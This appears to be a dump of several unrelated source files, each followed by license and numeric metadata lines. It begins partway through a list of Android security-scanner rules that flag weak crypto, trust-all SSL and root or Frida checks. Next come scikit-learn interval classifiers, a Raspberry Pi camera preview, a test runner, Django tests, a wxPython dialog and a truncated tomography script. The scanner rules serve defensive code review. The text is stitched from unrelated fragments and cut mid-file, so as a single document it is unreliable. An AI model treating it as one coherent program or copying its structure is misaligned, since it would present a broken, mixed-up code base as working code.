r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', 'level': 'warning', 'match': 'single_regex', 'input_case': 'exact', 'cvss': 4.3, 'cwe': 'CWE-200' }, { 'desc': 'Hidden elements in view can be used to hide data from user. But this data can be leaked', 'type': 'regex', 'regex1': r'setVisibility\(View\.GONE\)|setVisibility\(View\.INVISIBLE\)', 'level': 'high', 'match': 'single_regex', 'input_case': 'exact', 'cvss': 4.3, 'cwe': 'CWE-919' }, { 'desc': 'The App uses ECB mode in Cryptographic encryption algorithm. ECB mode is known to be weak as it results in the same ciphertext for identical blocks of plaintext.', 'type': 'regex', 'regex1': r'Cipher\.getInstance\(\s*"\s*AES\/ECB', 'level': 'high', 'match': 'single_regex', 'input_case': 'exact', 'cvss': 5.9, 'cwe': 'CWE-327' }, { 'desc': 'This App uses RSA Crypto without OAEP padding. The purpose of the padding scheme is to prevent a number of attacks on RSA that only work when the encryption is performed without padding.', 'type': 'regex', 'regex1': r'cipher\.getinstance\(\s*"rsa/.+/nopadding', 'level': 'high', 'match': 'single_regex', 'input_case': 'lower', 'cvss': 5.9, 'cwe': 'CWE-780' }, { 'desc': 'Insecure Implementation of SSL. Trusting all the certificates or accepting self signed certificates is a critical Security Hole. This application is vulnerable to MITM attacks', 'type': 'regex', 'regex1': r'javax\.net\.ssl', 'regex2': r'TrustAllSSLSocket-Factory|AllTrustSSLSocketFactory|NonValidatingSSLSocketFactory|net\.SSLCertificateSocketFactory|ALLOW_ALL_HOSTNAME_VERIFIER|\.setDefaultHostnameVerifier\(|NullHostnameVerifier\(', 'level': 'high', 'match': 'regex_and', 'input_case': 'exact', 'cvss': 7.4, 'cwe': 'CWE-295' }, { 'desc': 'WebView load files from external storage. Files in external storage can be modified by any application.', 'type': 'regex', 'regex1': r'\.loadUrl\(.*getExternalStorageDirectory\(', 'regex2': r'webkit\.WebView', 'level': 'high', 'match': 'regex_and', 'input_case': 'exact', 'cvss': 5.0, 'cwe': 'CWE-919' }, { 'desc': 'The file is World Readable. Any App can read from the file', 'type': 'regex', 'regex1': r'MODE_WORLD_READABLE|Context\.MODE_WORLD_READABLE', 'regex2': r'openFileOutput\(\s*".+"\s*,\s*1\s*\)', 'level': 'high', 'match': 'regex_or', 'input_case': 'exact', 'cvss': 4.0, 'cwe': 'CWE-276' }, { 'desc': 'The file is World Writable. Any App can write to the file', 'type': 'regex', 'regex1': r'MODE_WORLD_WRITABLE|Context\.MODE_WORLD_WRITABLE', 'regex2': r'openFileOutput\(\s*".+"\s*,\s*2\s*\)', 'level': 'high', 'match': 'regex_or', 'input_case': 'exact', 'cvss': 6.0, 'cwe': 'CWE-276' }, { 'desc': 'The file is World Readable and Writable. Any App can read/write to the file', 'type': 'regex', 'regex1': r'openFileOutput\(\s*".+"\s*,\s*3\s*\)', 'level': 'high', 'match': 'single_regex', 'input_case': 'exact', 'cvss': 6.0, 'cwe': 'CWE-276' }, { 'desc': 'Weak Hash algorithm used', 'type': 'regex', 'regex1': r'getInstance(\"md4\")|getInstance(\"rc2\")|getInstance(\"rc4\")|getInstance(\"RC4\")|getInstance(\"RC2\")|getInstance(\"MD4\")', 'level': 'high', 'match': 'single_regex', 'input_case': 'exact', 'cvss': 7.4, 'cwe': 'CWE-327' }, { 'desc': 'MD5 is a weak hash known to have hash collisions.', 'type': 'regex', 'regex1': r'MessageDigest\.getInstance\(\"*MD5\"*\)|MessageDigest\.getInstance\(\"*md5\"*\)|DigestUtils\.md5\(', 'level': 'high', 'match': 'single_regex', 'input_case': 'exact', 'cvss': 7.4, 'cwe': 'CWE-327' }, { 'desc': 'SHA-1 is a weak hash known to have hash collisions.', 'type': 'regex', 'regex1': r'MessageDigest\.getInstance\(\"*SHA-1\"*\)|MessageDigest\.getInstance\(\"*sha-1\"*\)|DigestUtils\.sha\(', 'level': 'high', 'match': 'single_regex', 'input_case': 'exact', 'cvss': 5.9, 'cwe': 'CWE-327' }, { 'desc': 'App can write to App Directory. Sensitive Information should be encrypted.', 'type': 'regex', 'regex1': r'MODE_PRIVATE|Context\.MODE_PRIVATE', 'level': 'info', 'match': 'single_regex', 'input_case': 'exact', 'cvss': 3.9, 'cwe': 'CWE-276' }, { 'desc': 'The App uses an insecure Random Number Generator.', 'type': 'regex', 'regex1': r'java\.util\.Random', 'level': 'high', 'match': 'single_regex', 'input_case': 'exact', 'cvss': 7.5, 'cwe': 'CWE-330' }, { 'desc': 'The App logs information. Sensitive information should never be logged.', 'type': 'regex', 'regex1': r'Log\.(v|d|i|w|e|f|s)|System\.out\.print|System\.err\.print', 'level': 'info', 'match': 'single_regex', 'input_case': 'exact', 'cvss': 7.5, 'cwe': 'CWE-532' }, { 'desc': 'This App uses Java Hash Code. It\'s a weak hash function and should never be used in Secure Crypto Implementation.', 'type': 'string', 'string1': '.hashCode()', 'level': 'high', 'match': 'single_string', 'input_case': 'exact', 'cvss': 4.3, 'cwe': 'CWE-327' }, { 'desc': 'These activities prevent screenshot when they go to background.', 'type': 'string', 'string1': 'LayoutParams.FLAG_SECURE', 'level': 'good', 'match': 'single_string', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'This App uses SQL Cipher. But the secret may be hardcoded.', 'type': 'string', 'string1': 'SQLiteOpenHelper.getWritableDatabase(', 'level': 'warning', 'match': 'single_string', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'This app has capabilities to prevent tapjacking attacks.', 'type': 'string', 'string1': 'setFilterTouchesWhenObscured(true)', 'level': 'good', 'match': 'single_string', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'App can read/write to External Storage. Any App can read data written to External Storage.', 'perm': 'android.permission.WRITE_EXTERNAL_STORAGE', 'type': 'string', 'string1': '.getExternalStorage', 'string2': '.getExternalFilesDir(', 'level': 'high', 'match': 'string_or_and_perm', 'input_case': 'exact', 'cvss': 5.5, 'cwe': 'CWE-276' }, { 'desc': 'App creates temp file. Sensitive information should never be written into a temp file.', 'perm': 'android.permission.WRITE_EXTERNAL_STORAGE', 'type': 'string', 'string1': '.createTempFile(', 'level': 'high', 'match': 'string_and_perm', 'input_case': 'exact', 'cvss': 5.5, 'cwe': 'CWE-276' }, { 'desc': 'Insecure WebView Implementation. Execution of user controlled code in WebView is a critical Security Hole.', 'type': 'string', 'string1': 'setJavaScriptEnabled(true)', 'string2': '.addJavascriptInterface(', 'level': 'warning', 'match': 'string_and', 'input_case': 'exact', 'cvss': 8.8, 'cwe': 'CWE-749' }, { 'desc': 'This App uses SQL Cipher. SQLCipher provides 256-bit AES encryption to sqlite database files.', 'type': 'string', 'string1': 'SQLiteDatabase.loadLibs(', 'string2': 'net.sqlcipher.', 'level': 'info', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'This App download files using Android Download Manager', 'type': 'string', 'string1': 'android.app.DownloadManager', 'string2': 'getSystemService(DOWNLOAD_SERVICE)', 'level': 'high', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'This App use Realm Database with encryption.', 'type': 'string', 'string1': 'io.realm.Realm', 'string2': '.encryptionKey(', 'level': 'good', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'The App may use weak IVs like "0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00" or "0x01,0x02,0x03,0x04,0x05,0x06,0x07". Not using a random IV makes the resulting ciphertext much more predictable and susceptible to a dictionary attack.', 'type': 'string', 'string1': '0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00', 'string2': '0x01,0x02,0x03,0x04,0x05,0x06,0x07', 'level': 'high', 'match': 'string_or', 'input_case': 'exact', 'cvss': 9.8, 'cwe': 'CWE-329' }, { 'desc': 'Remote WebView debugging is enabled.', 'type': 'string', 'string1': '.setWebContentsDebuggingEnabled(true)', 'string2': 'WebView', 'level': 'high', 'match': 'string_and', 'input_case': 'exact', 'cvss': 5.4, 'cwe': 'CWE-919' }, { 'desc': 'This app listens to Clipboard changes. Some malwares also listen to Clipboard changes.', 'type': 'string', 'string1': 'content.ClipboardManager', 'string2': 'OnPrimaryClipChangedListener', 'level': 'warning', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'This App copies data to clipboard. Sensitive data should not be copied to clipboard as other applications can access it.', 'type': 'string', 'string1': 'content.ClipboardManager', 'string2': 'setPrimaryClip(', 'level': 'info', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'Insecure WebView Implementation. WebView ignores SSL Certificate errors and accept any SSL Certificate. This application is vulnerable to MITM attacks', 'type': 'string', 'string1': 'onReceivedSslError(WebView', 'string2': '.proceed();', 'level': 'high', 'match': 'string_and', 'input_case': 'exact', 'cvss': 7.4, 'cwe': 'CWE-295' }, { 'desc': 'App uses SQLite Database and execute raw SQL query. Untrusted user input in raw SQL queries can cause SQL Injection. Also sensitive information should be encrypted and written to the database.', 'type': 'string', 'string1': 'android.database.sqlite', 'string_or1': 'rawQuery(', 'string_or2': 'execSQL(', 'level': 'high', 'match': 'string_and_or', 'input_case': 'exact', 'cvss': 5.9, 'cwe': 'CWE-89' }, { 'desc': 'This App detects frida server.', 'type': 'string', 'string1': 'fridaserver', 'string_or1': '27047', 'string_or2': 'REJECT', 'string_or3': 'LIBFRIDA', 'level': 'good', 'match': 'string_and_or', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'This App uses an SSL Pinning Library (org.thoughtcrime.ssl.pinning) to prevent MITM attacks in secure communication channel.', 'type': 'string', 'string1': 'org.thoughtcrime.ssl.pinning', 'string_or1': 'PinningHelper.getPinnedHttpsURLConnection', 'string_or2': 'PinningHelper.getPinnedHttpClient', 'string_or3': 'PinningSSLSocketFactory(', 'level': 'good', 'match': 'string_and_or', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'This App has capabilities to prevent against Screenshots from Recent Task History/ Now On Tap etc.', 'type': 'string', 'string1': '.FLAG_SECURE', 'string_or1': 'getWindow().setFlags(', 'string_or2': 'getWindow().addFlags(', 'level': 'high', 'match': 'string_and_or', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'DexGuard Debug Detection code to detect wheather an App is debuggable or not is identified.', 'type': 'string', 'string1': 'import dexguard.util', 'string2': 'DebugDetector.isDebuggable', 'level': 'good', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'DexGuard Debugger Detection code is identified.', 'type': 'string', 'string1': 'import dexguard.util', 'string2': 'DebugDetector.isDebuggerConnected', 'level': 'good', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'DexGuard Emulator Detection code is identified.', 'type': 'string', 'string1': 'import dexguard.util', 'string2': 'EmulatorDetector.isRunningInEmulator', 'level': 'good', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'DecGuard code to detect wheather the App is signed with a debug key or not is identified.', 'type': 'string', 'string1': 'import dexguard.util', 'string2': 'DebugDetector.isSignedWithDebugKey', 'level': 'good', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'DexGuard Root Detection code is identified.', 'type': 'string', 'string1': 'import dexguard.util', 'string2': 'RootDetector.isDeviceRooted', 'level': 'good', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'DexGuard App Tamper Detection code is identified.', 'type': 'string', 'string1': 'import dexguard.util', 'string2': 'TamperDetector.checkApk', 'level': 'good', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'DexGuard Signer Certificate Tamper Detection code is identified.', 'type': 'string', 'string1': 'import dexguard.util', 'string2': 'TCertificateChecker.checkCertificate', 'level': 'good', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'The App may use package signature for tamper detection.', 'type': 'string', 'string1': 'PackageManager.GET_SIGNATURES', 'string2': 'getPackageName(', 'level': 'good', 'match': 'string_and', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'This App uses SafetyNet API.', 'type': 'string', 'string1': 'com.google.android.gms.safetynet.SafetyNetApi', 'level': 'good', 'match': 'single_string', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }, { 'desc': 'This App may request root (Super User) privileges.', 'type': 'string', 'string1': 'com.noshufou.android.su', 'string2': 'com.thirdparty.superuser', 'string3': 'eu.chainfire.supersu', 'string4': 'com.koushikdutta.superuser', 'string5': 'eu.chainfire.', 'level': 'high', 'match': 'string_or', 'input_case': 'exact', 'cvss': 0, 'cwe': 'CWE-250' }, { 'desc': 'This App may have root detection capabilities.', 'type': 'string', 'string1': '.contains("test-keys")', 'string2': '/system/app/Superuser.apk', 'string3': 'isDeviceRooted()', 'string4': '/system/bin/failsafe/su', 'string5': '/system/sd/xbin/su', 'string6': '"/system/xbin/which", "su"', "string7": 'RootTools.isAccessGiven()', 'level': 'good', 'match': 'string_or', 'input_case': 'exact', 'cvss': 0, 'cwe': '' }]
gpl-3.0
4,659,156,025,997,647,000
33.277064
246
0.512379
false
3.44861
false
false
false
vene/ambra
ambra/classifiers.py
1
6082
import numpy as np from sklearn.base import BaseEstimator from sklearn.linear_model import LogisticRegression, Ridge from sklearn.utils.extmath import safe_sparse_dot from sklearn.utils.validation import check_random_state from pairwise import pairwise_transform, flip_pairs def _nearest_sorted(scores, to_find, k=10): position = np.searchsorted(scores, to_find) width = k / 2 offset = k % 2 if position < width: return slice(None, k) elif position > len(scores) - width - offset: return slice(-k, None) else: return slice(position - width, position + width + offset) def _interval_dist(a, b): a_lo, a_hi = a b_lo, b_hi = b if b_lo >= a_lo and b_hi <= a_hi: # b contained in a return 0.0 else: return np.abs(0.5 * (b_lo + b_hi - a_lo - a_hi)) class DummyIntervalClassifier(BaseEstimator): """Dummy predictor that chooses one of the possible intervals. Possible target intervals have to be passed along with each training instance. Can be used as a simple baseline for sanity-checking. Parameters ---------- method: {"center" (default)|"random"}, If "center", always predicts the middle interval from the list given. If "random", an interval is uniformly picked. random_state: None (default) int or np.random object, Seed for the random number generator. Only used if `method="random"`. """ def __init__(self, method="center", random_state=None): self.method = method self.random_state = random_state def fit(self, X, Y): pass def _predict_interval(self, possible_intervals, rng=None): if self.method == "center": return possible_intervals[len(possible_intervals) / 2] elif self.method == "random": if rng is None: rng = check_random_state(self.random_state) return possible_intervals[rng.randint(len(possible_intervals))] def predict(self, X, Y_possible): if self.method == "random": rng = check_random_state(self.random_state) else: rng = None return [self._predict_interval(possible_intervals, rng) for possible_intervals in Y_possible] class IntervalRidge(Ridge): def predict(self, X, Y_possible): predicted_years = super(IntervalRidge, self).predict(X) predicted_intervals = np.array([self.get_interval(possible_intervals, predicted_year) for possible_intervals, predicted_year in zip(Y_possible, predicted_years)]) return predicted_intervals def fit(self, X, Y): Y_regression = np.array([np.mean(y) for y in Y]) return super(IntervalRidge, self).fit(X, Y_regression) def get_interval(self, intervals, year): year = int(year) # if the year is not included in any of the intervals, # it is situated either to the left or to the right of the possible intervals if year < intervals[0][0]: return intervals[0] elif year > intervals[-1][1]: return intervals[-1] else: # TODO: can be implemented with np.searchsorted for interval in intervals: if interval[0] <= year <= interval[1]: return interval class IntervalLogisticRegression(LogisticRegression): def __init__(self, penalty='l2', dual=False, tol=1e-4, C=1.0, random_state=None, solver='liblinear', max_iter=100, multi_class='ovr', verbose=0, n_neighbors=5, limit_pairs=1.0): self.penalty = penalty self.dual = dual self.tol = tol self.C = C self.fit_intercept = False self.intercept_scaling = 1 self.class_weight = None self.random_state = random_state self.solver = solver self.max_iter = max_iter self.multi_class = multi_class self.verbose = verbose self.n_neighbors = n_neighbors self.limit_pairs = limit_pairs self.loss = 'lr' # required for sklearn 0.15.2 def fit(self, X, y): rng = check_random_state(self.random_state) X_pw = pairwise_transform(X, y, limit=self.limit_pairs, random_state=rng) X_pw, y_pw = flip_pairs(X_pw, random_state=rng) self.n_pairs_ = len(y_pw) super(IntervalLogisticRegression, self).fit(X_pw, y_pw) train_scores = safe_sparse_dot(X, self.coef_.ravel()) order = np.argsort(train_scores) self.train_intervals_ = y[order] self.train_scores_ = train_scores[order] return self def score(self, X, y): print("pairwise accuracy is used") X_pw = pairwise_transform(X, y) X_pw, y_pw = flip_pairs(X_pw, random_state=0) # not fair return super(IntervalLogisticRegression, self).score(X_pw, y_pw) def _predict_interval(self, score, possible_intervals): interval_scores = [sum(_interval_dist(cand, nearest) for nearest in self.train_intervals_[ _nearest_sorted(self.train_scores_, score, k=self.n_neighbors)]) for cand in possible_intervals] return possible_intervals[np.argmin(interval_scores)] def predict(self, X, Y_possible): pred_scores = safe_sparse_dot(X, self.coef_.ravel()) return [self._predict_interval(score, possible_intervals) for score, possible_intervals in zip(pred_scores, Y_possible)] if __name__ == '__main__': X = np.arange(10)[:, np.newaxis] Y = [[4, 7], [1, 3], [2, 4], [8, 15], [5, 6], [1, 2], [10, 11], [10, 12], [10, 13], [10, 14]] from sklearn.cross_validation import KFold, cross_val_score from sklearn.utils import shuffle X, Y = shuffle(X, Y, random_state=0) print cross_val_score(IntervalLogisticRegression(C=1.0), X, Y, cv=KFold(len(X), n_folds=3))
bsd-2-clause
3,683,267,477,776,859,000
37.0125
93
0.598652
false
3.794136
false
false
false
ch1bo/ambicam
preview.py
1
3567
# Interactive preview module, run with python -i import cv2 import numpy as np import picamera import picamera.array import sys import multiprocessing as mp RESOLUTION = (640,480) FRAMERATE = 5 OFFSET = 10 M = np.load('M.npy') width, height = np.load('res.npy') def compute_map(M_inv, x, y, width, height): coords = [] for j in range(int(y), int(y+height)): for i in range(int(x), int(x+width)): coords.append([i, j, 1]) return np.dot(M_inv, np.array(coords).T).astype('float32') class HyperionOutput(picamera.array.PiRGBAnalysis): def __init__(self, camera, M, width, height, offset=10): super(HyperionOutput, self).__init__(camera) self.finished = mp.Event() self.M_inv = np.linalg.inv(M) self.width = int(width) self.height = int(height) self.offset = offset # Calculate source image maps self.top_map = compute_map(self.M_inv, 0, 0, width, offset) self.left_map = compute_map(self.M_inv, 0, offset, offset, height-2*offset) self.right_map = compute_map(self.M_inv, width-offset, offset, offset, height-2*offset) self.bottom_map = compute_map(self.M_inv, 0, height-offset, width, offset) # TODO cv2.convertMaps to make them fix-point -> faster? def analyze(self, img): # warped = cv2.warpPerspective(img, M, (width,10)) # Warp image map-by-map top = cv2.remap(img, self.top_map[0], self.top_map[1], cv2.INTER_LINEAR).reshape(self.offset,self.width,3) left = cv2.remap(img, self.left_map[0], self.left_map[1], cv2.INTER_LINEAR).reshape(self.height-2*self.offset,self.offset,3) right = cv2.remap(img, self.right_map[0], self.right_map[1], cv2.INTER_LINEAR).reshape(self.height-2*self.offset,self.offset,3) bottom = cv2.remap(img, self.bottom_map[0], self.bottom_map[1], cv2.INTER_LINEAR).reshape(self.offset,self.width,3) # Stitch and preview cv2.imshow('original', img) warped = np.zeros((self.height, self.width, 3), dtype='uint8') warped[:self.offset,:] += top warped[self.offset:-self.offset,:self.offset] += left warped[self.offset:-self.offset,self.width-self.offset:] += right warped[self.height-self.offset:,:] += bottom cv2.imshow('warped', warped) if cv2.waitKey(100) & 0xFF == ord("q"): self.finished.set() def settings(camera): print('analog_gain: ', camera.analog_gain) print('awb_mode: ', camera.awb_mode) print('awb_gains: ', camera.awb_gains) print('brightness: ', camera.brightness) print('contrast: ', camera.contrast) print('digital_gain: ', camera.digital_gain) print('exposure_mode: ', camera.exposure_mode) print('exposure_speed: ', camera.exposure_speed) print('iso: ', camera.iso) print('saturation: ', camera.saturation) print('sensor_mode: ', camera.sensor_mode) print('sharpness: ', camera.sharpness) print('shutter_speed: ', camera.shutter_speed) print('video_denoise: ', camera.video_denoise) print('video_stabilization: ', camera.video_stabilization) print('zoom: ', camera.zoom) with picamera.PiCamera(resolution=RESOLUTION, framerate=FRAMERATE) as camera: settings(camera) with HyperionOutput(camera, M, width, height, offset=OFFSET) as output: camera.start_recording(output, 'bgr') while not output.finished.wait(100): pass camera.stop_recording()
mpl-2.0
-1,066,425,132,792,566,400
41.464286
95
0.630782
false
3.225136
false
false
false
yuri-kilochek/graphematizer
tests/run.py
1
5005
import os import os.path import subprocess import argparse import collections import itertools import time import sys GRAPHEMATIZER_PATH = os.path.normpath('../graphematizer') TERMINAL_WIDTH = 80 arg_parser = argparse.ArgumentParser() arg_parser.add_argument('test_set', help='Test set to run.') arg_parser.add_argument('-c', '--concurrency', type=int, default=(os.cpu_count() or 4)**3, help='Max amount of tests to run concurrently.' ' Defaults to CPU count cubed or 16 if is is unavailable.') arg_parser.add_argument('-t', '--score_threshold', type=float, default=0.0, help='If a test scores below this value it will be shown. Default to 0.0, showing no tests.') args = arg_parser.parse_args() def lcs_len(a, b): m = len(a) n = len(b) c = [[0] * (n + 1)] * (m + 1) for i in range(1, m + 1): for j in range(1, n + 1): if a[i - 1] == b[j - 1]: c[i][j] = c[i - 1][j - 1] + 1 else: c[i][j] = max(c[i][j - 1], c[i - 1][j]) return c[m][n] def load_graphemes(graphemes_pathname): with open(graphemes_pathname, 'r', encoding='utf-8') as file: return [g.rstrip() for g in file.readlines()] class Tester: def __init__(self, test_id): self._test_id = test_id plaintext_path = os.path.join(args.test_set, 'tests', os.path.join(*test_id), 'plaintext.txt') self._true_graphemes_path = os.path.join(args.test_set, 'tests', os.path.join(*test_id), 'graphemes.txt') self._test_graphemes_path = '~{}-{}-graphemes.txt'.format(args.test_set, '-'.join(test_id)) self._process = subprocess.Popen([GRAPHEMATIZER_PATH, os.path.relpath(plaintext_path, GRAPHEMATIZER_PATH), os.path.relpath(self._test_graphemes_path, GRAPHEMATIZER_PATH)]) self._result = None @property def result(self): if self._result is None: self._process.poll() if self._process.returncode is None: return None if self._process.returncode != 0: raise Exception('Test {} is bad.'.format('/'.join(self._test_id))) true_graphemes = load_graphemes(self._true_graphemes_path) test_graphemes = load_graphemes(self._test_graphemes_path) os.remove(self._test_graphemes_path) total = len(true_graphemes) match = lcs_len([g[2:] for g in true_graphemes], [g[2:] for g in test_graphemes]) match_marked = lcs_len(true_graphemes, test_graphemes) self._result = self._test_id, total, match, match_marked return self._result def enumerate_tests(): def enumerate_tests(path, test_id): for _, dirs, files in os.walk(path): if 'plaintext.txt' in files: yield test_id else: for dir in dirs: yield from enumerate_tests(os.path.join(path, dir), test_id + [dir]) break yield from enumerate_tests(os.path.join(args.test_set, 'tests'), []) def do_tests(): testers = collections.deque() test_ids = iter(enumerate_tests()) while True: while testers and testers[0].result is not None: yield testers.popleft().result active_count = 0 for tester in testers: if tester.result is None: active_count += 1 if active_count < args.concurrency: next_id = next(test_ids, None) if next_id is None: break testers.append(Tester(next_id)) else: time.sleep(sys.float_info.epsilon) while testers: if testers[0].result is not None: yield testers.popleft().result else: time.sleep(sys.float_info.epsilon) def compute_scores(total, match, match_marked): if total > 0: return match / total, match_marked / total else: return 1.0, 1.0 total = 0 match = 0 match_marked = 0 print('bad tests (with score below {}):'.format(args.score_threshold)) print(' {:>14} | {:>14} | {}'.format('score', 'score marked', 'id')) for i, (i_id, i_total, i_match, i_match_marked) in enumerate(do_tests()): i_score, i_score_marked = compute_scores(i_total, i_match, i_match_marked) if i_score < args.score_threshold or i_score_marked < args.score_threshold: text = '{:>14.3f}% | {:>14.3f}% | {}'.format(i_score * 100, i_score_marked * 100, '/'.join(i_id)) print(text, end=' ' * (TERMINAL_WIDTH - 1 - len(text)) + '\n') total += i_total match += i_match; match_marked += i_match_marked score, score_marked = compute_scores(total, match, match_marked) text = '{:>14.3f}% | {:>14.3f}% | <total over {} tests>'.format(score * 100, score_marked * 100, i) print(text, end=' ' * (TERMINAL_WIDTH - 1 - len(text)) + '\r') print() print('Done.')
gpl-3.0
-6,139,452,096,908,997,000
32.817568
117
0.57003
false
3.294931
true
false
false
ceos-seo/data_cube_utilities
data_cube_utilities/transect/interpolate.py
1
1702
import numpy as np from itertools import islice nan = np.nan def window(seq, n=2): "Returns a sliding window (of width n) over data from the iterable" " s -> (s0,s1,...s[n-1]), (s1,s2,...,sn), ... " it = iter(seq) result = tuple(islice(it, n)) if len(result) == n: yield result for elem in it: result = result[1:] + (elem,) yield result def hex_to_rgb(rgbstr): rgbstr= rgbstr.replace('#','') hex_prefix = '0x' r = hex_prefix + rgbstr[:2] g = hex_prefix + rgbstr[2:4] b = hex_prefix + rgbstr[4:] return np.array([int(r, 16), int(g, 16), int(b, 16)]) def _bin_and_index(value, size): '''Takes two arguments. value and size. value is a float between 0 and 1, size is the number of bins into which we divide the range 0 and 1. An index is returned denoting which of these bins value falls into ''' for i in range(size): if value > i/size and value <= (i + 1)/size: return i return 0 def get_gradient(colors, value): ''' make sure the value is between 0 and 1. If the value is between 0 and 1, you will get interpolated values in between. This displays gradients with quadruple digit precision ''' if np.isnan(value): return np.array([nan,nan,nan]) colors = [np.array(hex_to_rgb(color)) for color in colors] color_pairs = list(window(colors)) size = len(color_pairs) index = _bin_and_index(value,size) color1,color2 = color_pairs[index] direction = (color2 - color1).astype(float) v = value * size - index return (v * direction) + color1
apache-2.0
-6,673,177,766,192,212,000
28.859649
125
0.583431
false
3.431452
false
false
false
prabhugs/mynote
mynote/notes/tests.py
1
1217
from django.test import TestCase import datetime from django.utils import timezone from notes.models import Post # Create your tests here. class PostMethodTests(TestCase): def test_waspublishedrecently_with_future_post(self): """ :return: False for post whose published_date is in the future """ time = timezone.datetime.now() + datetime.timedelta(days=30) future_post = Post(published_date = time) self.assertEqual(future_post.waspublishedrecently(), False) def test_waspublishedrecently_with_old_post(self): """ :return: False for post whose published_date is greater than 24hrs from now """ time = timezone.datetime.now() - datetime.timedelta(days=30) future_post = Post(published_date = time) self.assertEqual(future_post.waspublishedrecently(), False) def test_waspublishedrecently_with_recent_post(self): """ :return: True for post whose published_date is not less than 24hrs from now """ time = timezone.datetime.now() - datetime.timedelta(hours=1) future_post = Post(published_date = time) self.assertEqual(future_post.waspublishedrecently(), True)
mit
-825,587,557,338,921,200
37.0625
83
0.677896
false
4.070234
true
false
false
mikan/racm
src/racm_ui_edit_dialog.py
1
1597
"""Subclass of EditDialog, which is generated by wxFormBuilder.""" import wx import racm_ui # Implementing EditDialog class EditDialog(racm_ui.EditDialog): _main_frame = None _row = -1 def __init__(self, parent, main_frame, host, port, name, row): racm_ui.EditDialog.__init__(self, parent) self._main_frame = main_frame self.port_text.SetValue(str(port)) self.host_text.SetValue(host) self.port_text.SetValue(port) self.name_text.SetValue(name) self._row = row def show_dialog(self, message): dialog = wx.MessageDialog(None, message, self.GetTitle(), wx.OK | wx.ICON_WARNING) dialog.ShowModal() dialog.Destroy() def show_missing_error(self, value_type): self.show_dialog("Please input the " + value_type + ".") def show_illegal_error(self, value_type, character): self.show_dialog("Illegal character \"" + character + "\" contained in " + value_type + ".") # Handlers for EditDialog events. def on_ok_clicked(self, event): if self.host_text.IsEmpty(): self.show_missing_error("host") return if ":" in self.host_text.Value: self.show_illegal_error("host", ":") return if self.port_text.IsEmpty(): self.show_missing_error("port") return host = self.host_text.Value + ":" + self.port_text.Value self._main_frame.edit_item(host, self.name_text.Value, "", self._row) self.Destroy() def on_cancel_clicked(self, event): self.Destroy()
bsd-3-clause
-3,549,579,078,472,662,500
32.270833
100
0.603632
false
3.629545
false
false
false
jianglab/tomography
tomoThickness.py
1
32556
#!/usr/bin/env python # # Author: Rui Yan <yan49@purdue.edu>, Sep 2015 # Copyright (c) 2012 Purdue University # # This software is issued under a joint BSD/GNU license. You may use the # source code in this file under either license. However, note that the # complete EMAN2 and SPARX software packages have some GPL dependencies, # so you are responsible for compliance with the licenses of these packages # if you opt to use BSD licensing. The warranty disclaimer below holds # in either instance. # # This complete copyright notice must be included in any revised version of the # source code. Additional authorship citations may be added, but existing # author citations must be preserved. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 2111-1307 USA # # from EMAN2 import * import os, sys, math, itertools import numpy as np import scipy from scipy.optimize import minimize from scipy.optimize import basinhopping from scipy.optimize import leastsq from scipy.optimize import curve_fit import matplotlib.pyplot as plt import collections from itertools import chain from scipy import stats import matplotlib.cm as cm from matplotlib.backends.backend_pdf import PdfPages def main(): progname = os.path.basename(sys.argv[0]) usage = """ Determine the thickness, sample tilt and mean free path of tomographic tilt series Example: python tomoThickness.py --tiltseries 6hSINVc1s2_17.ali --tiltangles 6hSINVc1s2_17.tlt --boxsize 200 --MFP 200 --B 1600 --d0 200 --theta0 5 --alpha0 0 --niter 200 --interval 50 --x0 1200,1400,1000,2400,2900,2600,1400,800 --y0 1100,1400,2000,3600,2900,600,2800,2400 python tomoThickness.py --tiltseries virus009.ali --tiltangles virus009.tlt --boxsize 200 --B 240 --d0 100 --alpha0 0 --theta0 0 --niter 400 --interval 50 --x0 1600,1500,1600,300 --y0 1600,1700,1800,300 """ parser = EMArgumentParser(usage=usage,version=EMANVERSION) parser.add_argument("--tiltseries", type=str, default='', help="tilt series with tilt axis along Y") parser.add_argument('--tiltangles',type=str,default='',help='File in .tlt format containing the tilt angle of each image in the tiltseries.') parser.add_argument("--boxsize", type=int, default=200, help="perform grid boxing using given box size. default to 200") parser.add_argument("--x0", type=str, default=0, help="for test on some regions, multiple regions are allowed, --x0 100,200,300") 